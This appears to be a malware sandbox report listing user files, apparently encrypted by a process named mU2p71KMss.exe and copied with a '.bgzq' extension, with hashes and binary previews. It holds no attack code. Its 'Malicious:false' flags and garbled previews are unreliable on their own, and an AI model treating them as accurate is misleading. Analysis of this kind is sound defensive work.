                                                                                                SSDEEP:24:+EGYxLOVzuuIGjgbVzo5bde5Ec0/8jEUQfADlxErR4MtZOBukek8LqSXfzIbD:+vALyuujjWzoxde5fs8jEz2lqrRZtMX5
                                                                                                MD5:1548F2CD02E955E200B2D7ABDC784FEF
                                                                                                SHA1:27F7782D3AE47E28D8EE1E95A76AEFC791ABA86A
                                                                                                SHA-256:02490D3A8741644D06165C25738B652A89F840E1F39880DE37DA7727855E8D73
                                                                                                SHA-512:9FEEC62B0765D741C0D9B4A02D1E6F51B7B0861BF6D2201523E93B72824B3DCCE6E9D6AD834AB6C57547A77EE1021418C878158036DAEA398AB5A3A195F3461C
                                                                                                Malicious:false
                                                                                                Preview:GRXZD...Je.......mN....d.....d.?..n..(.4.....H....+/.........o.S/....#1........ol.gx.mC.,3|k../.v\u..)A...<F.A..O..\..@af.W.....<....:.H.RF....0...P......d.Z.......cq!P.O.]..m*&(8....;......*..~..A......!..)x..E..<t.a.|.....eo.4.e..D...a....V?k;..wAE_).......U..Os...1"e..gG.[rC...2|....f.....:7..I|.....g.r.y.E..l'.$N.J.XT..[.`..:....WZ|..d*. ...8..._..\.8...Z.q.`..C..u..q.m.....|....u..H.i..}.>.L.|.?!_..."..pv.djAP...-...7..g.....b.....d.@.v....rKa.z.....q.}..nQ>2@...D.}...}..+..3...[../....,.B..j.wI`.Y..qj.9....Nd..3e..+.....<....+@wt....qu...G..&......."...!.. .V......$..d../.<....z..o2..../.O?.I@..-.5...b......C..E.`...j.x.2...2.5[.....9..J%#.B.....[$...=dQ.r........P.......).:..])......y.........WYd..."...M.......Z.eI.J:g.Z..H.Z@.x..B..............B.RD/P.x&I..O{....9A)b.j....>c?.6xQ......>..2.a.T..~.$......J....058.?..q].aSL...,.i...8.....DB......".7.......qy.(..A..5....v.J.....5PB._.Q.!.?.R. ep.W...!.".g.U..-....U|&..T...m...

                                                                                                C:\Users\user\Downloads\GRXZDKKVDB.xlsx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.838508153393482
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:+EGYxLOVzuuIGjgbVzo5bde5Ec0/8jEUQfADlxErR4MtZOBukek8LqSXfzIbD:+vALyuujjWzoxde5fs8jEz2lqrRZtMX5
                                                                                                MD5:1548F2CD02E955E200B2D7ABDC784FEF
                                                                                                SHA1:27F7782D3AE47E28D8EE1E95A76AEFC791ABA86A
                                                                                                SHA-256:02490D3A8741644D06165C25738B652A89F840E1F39880DE37DA7727855E8D73
                                                                                                SHA-512:9FEEC62B0765D741C0D9B4A02D1E6F51B7B0861BF6D2201523E93B72824B3DCCE6E9D6AD834AB6C57547A77EE1021418C878158036DAEA398AB5A3A195F3461C
                                                                                                Malicious:false
                                                                                                Preview:GRXZD...Je.......mN....d.....d.?..n..(.4.....H....+/.........o.S/....#1........ol.gx.mC.,3|k../.v\u..)A...<F.A..O..\..@af.W.....<....:.H.RF....0...P......d.Z.......cq!P.O.]..m*&(8....;......*..~..A......!..)x..E..<t.a.|.....eo.4.e..D...a....V?k;..wAE_).......U..Os...1"e..gG.[rC...2|....f.....:7..I|.....g.r.y.E..l'.$N.J.XT..[.`..:....WZ|..d*. ...8..._..\.8...Z.q.`..C..u..q.m.....|....u..H.i..}.>.L.|.?!_..."..pv.djAP...-...7..g.....b.....d.@.v....rKa.z.....q.}..nQ>2@...D.}...}..+..3...[../....,.B..j.wI`.Y..qj.9....Nd..3e..+.....<....+@wt....qu...G..&......."...!.. .V......$..d../.<....z..o2..../.O?.I@..-.5...b......C..E.`...j.x.2...2.5[.....9..J%#.B.....[$...=dQ.r........P.......).:..])......y.........WYd..."...M.......Z.eI.J:g.Z..H.Z@.x..B..............B.RD/P.x&I..O{....9A)b.j....>c?.6xQ......>..2.a.T..~.$......J....058.?..q].aSL...,.i...8.....DB......".7.......qy.(..A..5....v.J.....5PB._.Q.!.?.R. ep.W...!.".g.U..-....U|&..T...m...

                                                                                                C:\Users\user\Downloads\KLIZUSIQEN.png

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.849238674918251
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:bsMtfNa1F/z+e7dQNfAz6yhwebpjUekTcpXw6LPxWF2nBYqeTncbal6XfzIbD:oMN8L/z+eEfAz6yhnjyCdYF2nBYhTyG9
                                                                                                MD5:52E345F87F6460646A404C48229B8E1D
                                                                                                SHA1:4FC445A380771145C745AE6ACCBE89ABF32A10D0
                                                                                                SHA-256:3B53DDA48DA73FBF6AD1291FBA71B2E8EF1FB08D4EFA8DC0C9B5305E41C75228
                                                                                                SHA-512:58D529FCFE33717A7F7B2A802A3411C497C47CFA4ECE9C7CED0B06839694F3715169F51850CA0DFAA99FF965599DB1CBB7F5BE9B4A3DEAAE12EF467E8532EDF7
                                                                                                Malicious:false
                                                                                                Preview:KLIZU.7...~...WG..)[..!...~P.d.....d#....i... ...[.i..v .Ap.m4....(..../.|.l.D\..w..a.......9|F@(....3.4.....Z`ytUR.....a.(F..Bj.|.4L..?>]d.d..F............4..z[..p.......X.:{..(.....I..%y.e..a.1..@O.)....2..7...zM]k...<.Lf..I..}..GJ?..X.......6c...}..0]...W... .!o..8.)#.a...cv..R.J...D..8.=......o.Q..s..;..I..A.....oAbAO.....U1.v..(E.qmV.T.B.H3...uft...x.%..|`B.W.&<q.)E....dB.j....T..A.1..\.....V..6~5....!.HpyQ.Fm.,Y>..qg]....*.`...Y.b3.p/.F......L....F.O...)ub....M>:@..E.Ya<.......}.V.p.<(d=aN:%.z..n.Q?i...k...N.4.d.!.7...%8...c..p%.1.\2.......%..Cn.....Pp.....h7..y.M..H<.P.'d!..t...Q..... v3+..g..(b...D...?\~..s.b`. .<9..._.,+....>O.....$..'....J..V."N.....N@...E)..X+.*........n.:...............}[...y.Har.%...U^.qY.D#(\.....En...o..1#......shr...._.^....e.Rq.Pl...8.......V..(.8i.4..3(.nGR.7..Y....}.U.04.D...V.......D.v..m#B.V..Zp.|......<..$.1..[MBd.}..I.;. .....[C^.)r....Ui....b|.....x.......`..U.....!...C...aS.LK0..!}.(e...i_.

                                                                                                C:\Users\user\Downloads\KLIZUSIQEN.png.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.849238674918251
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:bsMtfNa1F/z+e7dQNfAz6yhwebpjUekTcpXw6LPxWF2nBYqeTncbal6XfzIbD:oMN8L/z+eEfAz6yhnjyCdYF2nBYhTyG9
                                                                                                MD5:52E345F87F6460646A404C48229B8E1D
                                                                                                SHA1:4FC445A380771145C745AE6ACCBE89ABF32A10D0
                                                                                                SHA-256:3B53DDA48DA73FBF6AD1291FBA71B2E8EF1FB08D4EFA8DC0C9B5305E41C75228
                                                                                                SHA-512:58D529FCFE33717A7F7B2A802A3411C497C47CFA4ECE9C7CED0B06839694F3715169F51850CA0DFAA99FF965599DB1CBB7F5BE9B4A3DEAAE12EF467E8532EDF7
                                                                                                Malicious:false
                                                                                                Preview:KLIZU.7...~...WG..)[..!...~P.d.....d#....i... ...[.i..v .Ap.m4....(..../.|.l.D\..w..a.......9|F@(....3.4.....Z`ytUR.....a.(F..Bj.|.4L..?>]d.d..F............4..z[..p.......X.:{..(.....I..%y.e..a.1..@O.)....2..7...zM]k...<.Lf..I..}..GJ?..X.......6c...}..0]...W... .!o..8.)#.a...cv..R.J...D..8.=......o.Q..s..;..I..A.....oAbAO.....U1.v..(E.qmV.T.B.H3...uft...x.%..|`B.W.&<q.)E....dB.j....T..A.1..\.....V..6~5....!.HpyQ.Fm.,Y>..qg]....*.`...Y.b3.p/.F......L....F.O...)ub....M>:@..E.Ya<.......}.V.p.<(d=aN:%.z..n.Q?i...k...N.4.d.!.7...%8...c..p%.1.\2.......%..Cn.....Pp.....h7..y.M..H<.P.'d!..t...Q..... v3+..g..(b...D...?\~..s.b`. .<9..._.,+....>O.....$..'....J..V."N.....N@...E)..X+.*........n.:...............}[...y.Har.%...U^.qY.D#(\.....En...o..1#......shr...._.^....e.Rq.Pl...8.......V..(.8i.4..3(.nGR.7..Y....}.U.04.D...V.......D.v..m#B.V..Zp.|......<..$.1..[MBd.}..I.;. .....[C^.)r....Ui....b|.....x.......`..U.....!...C...aS.LK0..!}.(e...i_.

                                                                                                C:\Users\user\Downloads\NVWZAPQSQL.docx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.847463300195475
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FZsZo03pznUA0SWRwCDWWIjt+3oz5JmiIyfS4zMa4aDW6l6rf+arzpXfzIbD:FF03NnUNSWRd2+uy3mS4QautVrz5fzSD
                                                                                                MD5:06B9C1503B0AC49E39EB9E4EE7D6F854
                                                                                                SHA1:78C06949DBC6B4D931BB0B36C40DE66C3ECA08E9
                                                                                                SHA-256:A8C4D57F7924A39105D8E878E9F7408F96F181285A5DE89D6F7534857F9C4A3B
                                                                                                SHA-512:CE3A7473D2711225FB12B29C4B37EB79B9E2D7C74AD6D8E85FF5C34E75711AF8B7B92E1D24DF8DBDFC6E10B9302285E1509F771279AA6E760B54FEB0CFC252B8
                                                                                                Malicious:false
                                                                                                Preview:NVWZA..g.v0s..s.#.}.J#.;.I.B..N..`......P>.+T....k.K.j....]C..F...g0..C.U......].J.365.y...lRJ..(...f.*=.k..=...#A.1...5.L...u..M.......+..zT..<@.Z.A]..g.-5..m..\..KD...`,R..Y.qJ...b .z.#e).ygh2.......:...W..>."4.j.s{.`fE.V.Bg-.X....3.d.$.%.|Q_..6......cTt...........@Z..s..,..Y.^.....s..:....2.2./'s.g~.&.l..kk.3..;...W%....M.`..}.v.&6.N.....dFF!dKz<..P..D?mQZ..H.....@N...vo..C.h..-O..M......O...bu.'HR.ig..T..=..q.......h...91.."...<.....)..v.%2..w...Y.j.;.6s...ul......rj....[n....pI.=.*A...&.;.J8....5%..~.H....-Fd;F.T=.. .....c..+...V..\.H...x.....i.....m...^..X.a.3..l}%..>q..s.)..6Z..{...[..cD`.w.pVj..r..Q. .H....J....Y...ki.V.x.H..S....As..$....jo._P..E_...k..f._5n.%.m...e.l<.........X)..b...a$........<.;..o.Z....n.}.K-.M.9....!~.oN.F....|.Kh..jp.q.@Y...}.b..%d..f.qFn..". ...L.2....f...j...|fzn...?..c.<.Y.....p..6)>.&.h.x.y...cq8.<.5...s..|.?.n....%...D...=..*....op.(.....O.(..s.....(...xg....{.....=E.w.=|..2g..1.....g..&3b_a:....5r#...uX...~.[.W

                                                                                                C:\Users\user\Downloads\NVWZAPQSQL.docx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.847463300195475
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FZsZo03pznUA0SWRwCDWWIjt+3oz5JmiIyfS4zMa4aDW6l6rf+arzpXfzIbD:FF03NnUNSWRd2+uy3mS4QautVrz5fzSD
                                                                                                MD5:06B9C1503B0AC49E39EB9E4EE7D6F854
                                                                                                SHA1:78C06949DBC6B4D931BB0B36C40DE66C3ECA08E9
                                                                                                SHA-256:A8C4D57F7924A39105D8E878E9F7408F96F181285A5DE89D6F7534857F9C4A3B
                                                                                                SHA-512:CE3A7473D2711225FB12B29C4B37EB79B9E2D7C74AD6D8E85FF5C34E75711AF8B7B92E1D24DF8DBDFC6E10B9302285E1509F771279AA6E760B54FEB0CFC252B8
                                                                                                Malicious:false
                                                                                                Preview:NVWZA..g.v0s..s.#.}.J#.;.I.B..N..`......P>.+T....k.K.j....]C..F...g0..C.U......].J.365.y...lRJ..(...f.*=.k..=...#A.1...5.L...u..M.......+..zT..<@.Z.A]..g.-5..m..\..KD...`,R..Y.qJ...b .z.#e).ygh2.......:...W..>."4.j.s{.`fE.V.Bg-.X....3.d.$.%.|Q_..6......cTt...........@Z..s..,..Y.^.....s..:....2.2./'s.g~.&.l..kk.3..;...W%....M.`..}.v.&6.N.....dFF!dKz<..P..D?mQZ..H.....@N...vo..C.h..-O..M......O...bu.'HR.ig..T..=..q.......h...91.."...<.....)..v.%2..w...Y.j.;.6s...ul......rj....[n....pI.=.*A...&.;.J8....5%..~.H....-Fd;F.T=.. .....c..+...V..\.H...x.....i.....m...^..X.a.3..l}%..>q..s.)..6Z..{...[..cD`.w.pVj..r..Q. .H....J....Y...ki.V.x.H..S....As..$....jo._P..E_...k..f._5n.%.m...e.l<.........X)..b...a$........<.;..o.Z....n.}.K-.M.9....!~.oN.F....|.Kh..jp.q.@Y...}.b..%d..f.qFn..". ...L.2....f...j...|fzn...?..c.<.Y.....p..6)>.&.h.x.y...cq8.<.5...s..|.?.n....%...D...=..*....op.(.....O.(..s.....(...xg....{.....=E.w.=|..2g..1.....g..&3b_a:....5r#...uX...~.[.W

                                                                                                C:\Users\user\Downloads\NVWZAPQSQL.jpg

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.84391757439474
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FmIqk/tqFRIHTrn6x/VYr0QdPnNQQuMQcQC+FXZl15P6sOHOMFaEmMHhC+9UhcfG:FzF/t0mHTKi0Qd/4W+NzrU1ThbOh6Shx
                                                                                                MD5:A3D10A3083FDE888097FD3D6B312A455
                                                                                                SHA1:47EC4595947553C075ADEB3444233B8A29E97F9C
                                                                                                SHA-256:EABB564365E8BB5F0A674CCD9BBB00864E9A8603B094F100BD88A042C76D08DC
                                                                                                SHA-512:CA9755F17A9E286A316E019ADDC51E9865EA14DF28323A5CE295E73904F98DC4D049F3C7C4BF9E679E71AEE754324ACB2E8804491DE442C90285913D29B897C8
                                                                                                Malicious:false
                                                                                                Preview:NVWZA.(..9.D.....k..H},U}.....9&v......7......45$z..n.....s....w.O..)~.G.H...~.0+..9.Ia.h0..m..I....~...u...[..)...UQ.k...\.-".&.C~.T.$....C.H4H...Jz..vW...........8....N....J.xV..mx.._..p..r.~.b...F...).....>..`..C!..,~X....,.....Q...........H.Nb.J.l..R....f...`.Z...'.y.V.d..m.......z..Q........@....+.\m..E...".T.mm.2.(SB.co.=@.y.A.._...~^]..d|.:..mC!5..S2}.[<.6.9.o..:..rMXw4...n....2.#L6....j...9}.I4..hs{.4E1.O..l......`..w..3....W...O.m..{..F.1...!..P.3.m.....>..o...y[.:Z...x}MO.....j.V)8.0...:...i...\..\.)'..o.G...z.i.iMy*..#..1B......&2..3.s.K.Nx....=()....u.4.. ._..Dmr.?...C..$.H....wRN. w..N'..(.M...@... ..X..d ...?~...($.q..C.C@_.Xr..ZGd.9...A..H.q........ @.Kg......X..r.{o"...P..~..t..Z...{......B2kD..S...c......j9.5.0...........*.A.R.Z...........^....g.........wZ.gk....Z^..L-z..nn..\..l...^..a...@yF...(7.|....6LT.C:.15.k..........Fx.xX..a...R.....m.....H..V9..B...E....rC...d..8...K....d.x.C....rF(a}....y.....<Sc.b.\..y...X

                                                                                                C:\Users\user\Downloads\NVWZAPQSQL.jpg.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.84391757439474
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FmIqk/tqFRIHTrn6x/VYr0QdPnNQQuMQcQC+FXZl15P6sOHOMFaEmMHhC+9UhcfG:FzF/t0mHTKi0Qd/4W+NzrU1ThbOh6Shx
                                                                                                MD5:A3D10A3083FDE888097FD3D6B312A455
                                                                                                SHA1:47EC4595947553C075ADEB3444233B8A29E97F9C
                                                                                                SHA-256:EABB564365E8BB5F0A674CCD9BBB00864E9A8603B094F100BD88A042C76D08DC
                                                                                                SHA-512:CA9755F17A9E286A316E019ADDC51E9865EA14DF28323A5CE295E73904F98DC4D049F3C7C4BF9E679E71AEE754324ACB2E8804491DE442C90285913D29B897C8
                                                                                                Malicious:false
                                                                                                Preview:NVWZA.(..9.D.....k..H},U}.....9&v......7......45$z..n.....s....w.O..)~.G.H...~.0+..9.Ia.h0..m..I....~...u...[..)...UQ.k...\.-".&.C~.T.$....C.H4H...Jz..vW...........8....N....J.xV..mx.._..p..r.~.b...F...).....>..`..C!..,~X....,.....Q...........H.Nb.J.l..R....f...`.Z...'.y.V.d..m.......z..Q........@....+.\m..E...".T.mm.2.(SB.co.=@.y.A.._...~^]..d|.:..mC!5..S2}.[<.6.9.o..:..rMXw4...n....2.#L6....j...9}.I4..hs{.4E1.O..l......`..w..3....W...O.m..{..F.1...!..P.3.m.....>..o...y[.:Z...x}MO.....j.V)8.0...:...i...\..\.)'..o.G...z.i.iMy*..#..1B......&2..3.s.K.Nx....=()....u.4.. ._..Dmr.?...C..$.H....wRN. w..N'..(.M...@... ..X..d ...?~...($.q..C.C@_.Xr..ZGd.9...A..H.q........ @.Kg......X..r.{o"...P..~..t..Z...{......B2kD..S...c......j9.5.0...........*.A.R.Z...........^....g.........wZ.gk....Z^..L-z..nn..\..l...^..a...@yF...(7.|....6LT.C:.15.k..........Fx.xX..a...R.....m.....H..V9..B...E....rC...d..8...K....d.x.C....rF(a}....y.....<Sc.b.\..y...X

                                                                                                C:\Users\user\Downloads\NVWZAPQSQL.xlsx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.858697233205164
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FSY6MvctrWqEHGTK7Mt7lGs4sk1RMddm58c3y0uLAb8nwCcqRS6/TAOpVhXfzIbD:FBlEtiBOvQs/S6dm53+LPwCnLTAEfzSD
                                                                                                MD5:37B30D9449C076F44B0A0BC559DB5712
                                                                                                SHA1:213D94038945513577233A2E1AFD3B7A1399056B
                                                                                                SHA-256:EC7927B28756865564AA42CEDAD5D425F564DBBA57A01431B230096DE7EC529C
                                                                                                SHA-512:427060FA9F0AFADD1C7A6AA870AA8D9A270C958673169F1DA36E32797BB561583059ABE6F0F32D74189370A90EDB9FE37A0DD3FC1E11C61A9732145BDC2117B1
                                                                                                Malicious:false
                                                                                                Preview:NVWZA1..&.E..=g.........Oa..4...Q.P..H NM.F....f,.,.N..}..k..x.+.....h.../.+>.+....3..=....Y.....lq...........%e.....[m.....0.M.q.t.X.l.%......#..;Y...p/.6.|.8.9.cy...9d..m...CX.iA..";phm...WL.G|U.bM.0.......?.H....0..e.%..?N.....4,.d+j..).]...^i-..DUe.C...4.e..Ns....V.h.l$...yW..r...i..%..F..!O.6uU.X!0........v..3.b....+..+.....i.7..T.8'.M.W..f..=..oTn.<...S...9.#4O....$`......'......"8N.&..>...nn.j...=..b..GK.Q...GXid.V.....%..Cf.`x.of...(..k..~...8.....L...1.FM..Ve.p.f.w.2^...y.WX...n...1j.r.O.....Nc...t.*.ui.fw....i&{5.=/f.cY....^...8.D...V..."b..R...vp./.7...x..l9.m.C.q.. .....d...c.....P...q....!<.Ew\4..$..a.RCtoo.7]..*[..5..I..1.Y.jq..4.15!...$Z..1.>.e.u.........fCc.h.1r-.s.!.........$... ......t..1.(..a8.m. S.......s.b_A6_1aa....|...(.....2..Y-'..\w..<.?./G.D....yG..&....z.F...s.....wJ.G..U.@....R.u.8..W.....2`H.......S.!...l..>..O.....:.dG....H.....#B..4....z).oX.<.8.v|...1.Y.M..*)JA..*4.dD..j.....h..P...: .....unn.^>"|.).Y8..

                                                                                                C:\Users\user\Downloads\NVWZAPQSQL.xlsx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.858697233205164
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FSY6MvctrWqEHGTK7Mt7lGs4sk1RMddm58c3y0uLAb8nwCcqRS6/TAOpVhXfzIbD:FBlEtiBOvQs/S6dm53+LPwCnLTAEfzSD
                                                                                                MD5:37B30D9449C076F44B0A0BC559DB5712
                                                                                                SHA1:213D94038945513577233A2E1AFD3B7A1399056B
                                                                                                SHA-256:EC7927B28756865564AA42CEDAD5D425F564DBBA57A01431B230096DE7EC529C
                                                                                                SHA-512:427060FA9F0AFADD1C7A6AA870AA8D9A270C958673169F1DA36E32797BB561583059ABE6F0F32D74189370A90EDB9FE37A0DD3FC1E11C61A9732145BDC2117B1
                                                                                                Malicious:false
                                                                                                Preview:NVWZA1..&.E..=g.........Oa..4...Q.P..H NM.F....f,.,.N..}..k..x.+.....h.../.+>.+....3..=....Y.....lq...........%e.....[m.....0.M.q.t.X.l.%......#..;Y...p/.6.|.8.9.cy...9d..m...CX.iA..";phm...WL.G|U.bM.0.......?.H....0..e.%..?N.....4,.d+j..).]...^i-..DUe.C...4.e..Ns....V.h.l$...yW..r...i..%..F..!O.6uU.X!0........v..3.b....+..+.....i.7..T.8'.M.W..f..=..oTn.<...S...9.#4O....$`......'......"8N.&..>...nn.j...=..b..GK.Q...GXid.V.....%..Cf.`x.of...(..k..~...8.....L...1.FM..Ve.p.f.w.2^...y.WX...n...1j.r.O.....Nc...t.*.ui.fw....i&{5.=/f.cY....^...8.D...V..."b..R...vp./.7...x..l9.m.C.q.. .....d...c.....P...q....!<.Ew\4..$..a.RCtoo.7]..*[..5..I..1.Y.jq..4.15!...$Z..1.>.e.u.........fCc.h.1r-.s.!.........$... ......t..1.(..a8.m. S.......s.b_A6_1aa....|...(.....2..Y-'..\w..<.?./G.D....yG..&....z.F...s.....wJ.G..U.@....R.u.8..W.....2`H.......S.!...l..>..O.....:.dG....H.....#B..4....z).oX.<.8.v|...1.Y.M..*)JA..*4.dD..j.....h..P...: .....unn.^>"|.).Y8..

                                                                                                C:\Users\user\Downloads\PALRGUCVEH.jpg

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.846109655496152
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ToouqwM64djtTzmVSluPfxe3Wy2e2GkNwdQDKU1d0AHS6K/HaVL9B5cK94kXfzIX:TLhyItTzJlWe3Whe2IQDL1d0efK/YL9M
                                                                                                MD5:4F9589EBD3154D6FD5166B0F7BAD37B1
                                                                                                SHA1:272AE581BEFB85689909BFD22F8A594F3BAA2F88
                                                                                                SHA-256:A67E60DD0F7208C73E316B493B7E404545DA0A8BFCE7C7C8E59ED8AA0E74E472
                                                                                                SHA-512:A950EDF154125A773A7AAABC79F5104CA134DBAE1E4CD0E8240B972570578353685F067095290A9DCFE90753C5982E96227083D90A7D78635140C89E1C963A01
                                                                                                Malicious:false
                                                                                                Preview:PALRG....!..i]...F......\1..-.*w...[..j..7...8ORk...iQ.X~........mK.:..........c7...=.e....5.~5.i......Y..w...SO.m.Y.Eue...._"*..........j.TWY:f.)...,.bU!?,...Q3...d..9.:u.fZ. .O.P-.=.......G.6.4.7../d......7......-|C....ec.../sh..E-'...pi.il.4..~..[...&.%.........r..R.\e...}&V.i...m2.}.....i....~..gN......Y...Cj+..hi..]..vD7.r.].....~KNm.dw%4...;T......yg0[...:.w$g(...P.......d`.Q..Qd..&..J#B.....4s..k..L..u.c...o....-.l.....p7.OK..QltMl....0.i.k..N.:b\d......A..H?.33\K`x.\.]...E..|....L^'o.c.7.J=.f:.h...Ff.C.U~(......gB..D....{.j<.bn.\er.!.....L....A.......N.....".j...5=..{h...."..l]........qx7...A........T.l.......fA.'..`,QS.YS..'. ..r7Wl.]...E0....&..]6...<..".......d.......BtSvq_s.!..tVc$<,\4.J2..c.@K.E.....}.........`...".V4..=%]..>......H.V.......94N.Rc..r.r.H.....Ae.xt..uh.!....._E.~fbkV..O.5.Y...v...C..L0P.\....k..}%.,.iq.m......[F..9.K......6.L..-c.+sy......r`I.~.....aO..~ ...)z-...b.....Gv+..n.k ~=3Zc..M*)..GK].....0..&...Y...J....>'.eS7

                                                                                                C:\Users\user\Downloads\PALRGUCVEH.jpg.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.846109655496152
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:ToouqwM64djtTzmVSluPfxe3Wy2e2GkNwdQDKU1d0AHS6K/HaVL9B5cK94kXfzIX:TLhyItTzJlWe3Whe2IQDL1d0efK/YL9M
                                                                                                MD5:4F9589EBD3154D6FD5166B0F7BAD37B1
                                                                                                SHA1:272AE581BEFB85689909BFD22F8A594F3BAA2F88
                                                                                                SHA-256:A67E60DD0F7208C73E316B493B7E404545DA0A8BFCE7C7C8E59ED8AA0E74E472
                                                                                                SHA-512:A950EDF154125A773A7AAABC79F5104CA134DBAE1E4CD0E8240B972570578353685F067095290A9DCFE90753C5982E96227083D90A7D78635140C89E1C963A01
                                                                                                Malicious:false
                                                                                                Preview:PALRG....!..i]...F......\1..-.*w...[..j..7...8ORk...iQ.X~........mK.:..........c7...=.e....5.~5.i......Y..w...SO.m.Y.Eue...._"*..........j.TWY:f.)...,.bU!?,...Q3...d..9.:u.fZ. .O.P-.=.......G.6.4.7../d......7......-|C....ec.../sh..E-'...pi.il.4..~..[...&.%.........r..R.\e...}&V.i...m2.}.....i....~..gN......Y...Cj+..hi..]..vD7.r.].....~KNm.dw%4...;T......yg0[...:.w$g(...P.......d`.Q..Qd..&..J#B.....4s..k..L..u.c...o....-.l.....p7.OK..QltMl....0.i.k..N.:b\d......A..H?.33\K`x.\.]...E..|....L^'o.c.7.J=.f:.h...Ff.C.U~(......gB..D....{.j<.bn.\er.!.....L....A.......N.....".j...5=..{h...."..l]........qx7...A........T.l.......fA.'..`,QS.YS..'. ..r7Wl.]...E0....&..]6...<..".......d.......BtSvq_s.!..tVc$<,\4.J2..c.@K.E.....}.........`...".V4..=%]..>......H.V.......94N.Rc..r.r.H.....Ae.xt..uh.!....._E.~fbkV..O.5.Y...v...C..L0P.\....k..}%.,.iq.m......[F..9.K......6.L..-c.+sy......r`I.~.....aO..~ ...)z-...b.....Gv+..n.k ~=3Zc..M*)..GK].....0..&...Y...J....>'.eS7

                                                                                                C:\Users\user\Downloads\PALRGUCVEH.xlsx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.845561417884031
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:qzbV1U0LcNDDEqA1rwvL0TZmA+nOtXrmYYkNinucSinxLt0dY/XfzIbD:OkrnxjcdrVYPn7SG7fzSD
                                                                                                MD5:8596F332E7017CDA230B371385D53FD3
                                                                                                SHA1:D9EEE97830DC43EFE88BB277EA54AE67009619BD
                                                                                                SHA-256:4175D36AF85768D16A02517DD5E77DE9DB285EDC20E39BC742753246E97393BD
                                                                                                SHA-512:AA8BD23A09A17811B6ADD86F6592400C6E10E08FCC421A34F7BE3030C4690F4815095211CD4E7790CD2D0D174532D506746D11DE0544DF6D42F546DD08D5636C
                                                                                                Malicious:false
